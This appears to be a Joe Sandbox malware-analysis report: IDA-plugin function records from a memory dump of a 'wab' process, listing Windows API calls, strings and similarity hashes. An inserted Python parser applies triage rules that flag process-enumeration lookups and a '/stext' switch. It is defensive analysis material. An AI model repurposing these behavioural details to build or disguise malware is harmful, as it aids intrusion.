                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ErrorLast$FilePointer
                      • String ID:
                      • API String ID: 1156039329-0
                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$ChangeCloseCreateFindNotificationTime
                      • String ID:
                      • API String ID: 1631957507-0
                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Temp$DirectoryFileNamePathWindows
                      • String ID:
                      • API String ID: 1125800050-0
                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID: d
                      • API String ID: 0-2564639436
                      • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                      • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: BINARY
                      • API String ID: 2221118986-907554435
                      • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                      • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                      APIs
                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                      • String ID:
                      • API String ID: 1161345128-0
                      • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                      • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID: /stext
                      • API String ID: 2081463915-3817206916
                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                      • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                      • String ID:
                      • API String ID: 159017214-0
                      • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                      • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 3150196962-0
                      • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                      • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                      APIs
                      Strings
                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: malloc
                      • String ID: failed to allocate %u bytes of memory
                      • API String ID: 2803490479-1168259600
                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcmpmemset
                      • String ID:
                      • API String ID: 1065087418-0
                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                      APIs
                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                        • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                      • String ID:
                      • API String ID: 1481295809-0
                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                      APIs
                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 3150196962-0
                      • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                      • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                      APIs
                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$PointerRead
                      • String ID:
                      • API String ID: 3154509469-0
                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                      APIs
                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfile$StringWrite_itowmemset
                      • String ID:
                      • API String ID: 4232544981-0
                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                      APIs
                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                      APIs
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$FileModuleName
                      • String ID:
                      • API String ID: 3859505661-0
                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
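The blocks above are the Joe Sandbox IDA plugin's per-function summaries: the direct and subcall API references with their call-site addresses, the strings a function touches, and the "Similarity" fields (API ID, String ID, Opcode ID, fuzzy hashes) that let the same function be matched across dumps. Reading hundreds of them by hand is slow, so below is an added example (not part of the report, and not Joe Sandbox or IDA code) of a small Python parser that turns these blocks into structured records and applies a few triage rules to them. It is fed a trimmed copy of three records from this page: the record whose subcall resolves psapi exports through GetProcAddress, the `_wcsicmp` record with String ID `/stext`, and the `malloc` record with its format string. The triage rules (`PROCESS_ENUM_EXPORTS`, the `/stext` check, the format-string check) and all function names are the editor's assumptions chosen to illustrate triage, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox IDA-plugin function records into structured data and flag
API-level indicators. Added example; SAMPLE is a trimmed copy of three records
from the report above, the triage rules are illustrative assumptions."""
import re
from collections import Counter

SAMPLE = """\
APIs
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Memory Dump Source
• Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$FileModuleName
• String ID:
• Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
APIs
Strings
Similarity
• API ID: _wcsicmp
• String ID: /stext
• Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
"""

SECTION_LABELS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally from a subcall.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\S+?)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STR_RE = re.compile(r"^(?P<s>.+), xrefs: (?P<addr>[0-9A-F]{8})$")
# Illustrative rule: exports a process-enumeration routine resolves at run time.
PROCESS_ENUM_EXPORTS = {"EnumProcesses", "EnumProcessModules",
                        "GetModuleFileNameExW", "GetModuleInformation"}


def parse_records(text):
    """Split the report text into records, one per 'APIs' block; lines that
    precede the first 'APIs' label (a record cut off by the page) are skipped."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_LABELS:
            if line == "APIs":                       # every record opens with its APIs block
                rec = {"apis": [], "strings": [], "fields": {}}
                records.append(rec)
            section = line
            continue
        if rec is None:
            continue
        line = line.lstrip("• ").strip()             # drop the bullet the page renders
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                d = m.groupdict()
                d["args"] = d["args"].split(",") if d["args"] else []
                rec["apis"].append(d)
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                rec["strings"].append((m["s"], m["addr"]))
        else:                                        # Similarity / dump-source key: value lines
            k, _, v = line.partition(":")
            rec["fields"][k.strip()] = v.strip()
    return records


def dynamic_imports(rec):
    """Names passed as GetProcAddress's second argument, i.e. exports resolved at run time."""
    return [a["args"][1] for a in rec["apis"]
            if a["api"] == "GetProcAddress" and len(a["args"]) >= 2
            and a["args"][1] not in ("?", "00000000")]


def triage(records):
    """(Opcode ID, reason) pairs for records worth a first look. Rules are assumptions."""
    hits = []
    for rec in records:
        oid = rec["fields"].get("Opcode ID", "?")
        hot = set(dynamic_imports(rec)) & PROCESS_ENUM_EXPORTS
        if hot:
            hits.append((oid, "resolves process-enumeration exports at run time: " + ", ".join(sorted(hot))))
        if rec["fields"].get("String ID") == "/stext":   # 'save as text' switch of NirSoft-style tools
            hits.append((oid, "compares a command-line argument against '/stext'"))
        for s, addr in rec["strings"]:
            if "%" in s:
                hits.append((oid, f"format string {s!r} referenced at {addr}"))
    return hits


def api_histogram(records):
    """How often each API name appears, direct calls and subcalls alike."""
    return Counter(a["api"] for rec in records for a in rec["apis"])


if __name__ == "__main__":
    for oid, why in triage(parse_records(SAMPLE)):
        print(oid[:12], why)
```

Each record is keyed by its Opcode ID, so hits can be cross-referenced with the page's other listings; `dynamic_imports` reads the resolved name from the second GetProcAddress argument exactly as the report prints it, so a `?` (argument not recovered) is dropped rather than reported as an export name.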
                      APIs
                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                      APIs
                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileWrite
                      • String ID:
                      • API String ID: 3934441357-0
                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                      APIs
                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
